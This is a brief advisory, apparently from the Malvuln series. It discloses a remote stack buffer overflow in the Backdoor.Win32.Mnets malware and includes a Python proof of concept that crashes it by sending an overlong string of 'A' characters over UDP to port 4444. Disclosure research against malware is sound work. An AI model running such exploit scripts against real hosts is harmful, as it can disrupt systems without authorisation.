Backdoor.Win32.Mnets Remote Stack Buffer Overflow

Backdoor.Win32.Mnets Remote Stack Buffer Overflow

Backdoor.Win32.Mnets malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=4444

def doit():
    #UDP Protocol
    s=socket(AF_INET, SOCK_DGRAM)
    s.connect((MALWARE_HOST, PORT))

    PACKEE = "A"*323

    s.send(PACKEE)
    s.close()

    print("Backdoor.Win32.Mnets / Remote Stack Buffer Overflow");
    print("MD5: 1e42493dcef54a62bc28e0a1338c1142");
    print("By Malvuln");

if __name__=="__main__":
    doit()